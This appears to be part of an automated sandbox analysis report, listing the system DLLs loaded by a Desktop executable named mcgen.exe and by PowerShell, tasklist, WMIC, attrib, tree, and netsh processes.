              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: dciman32.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
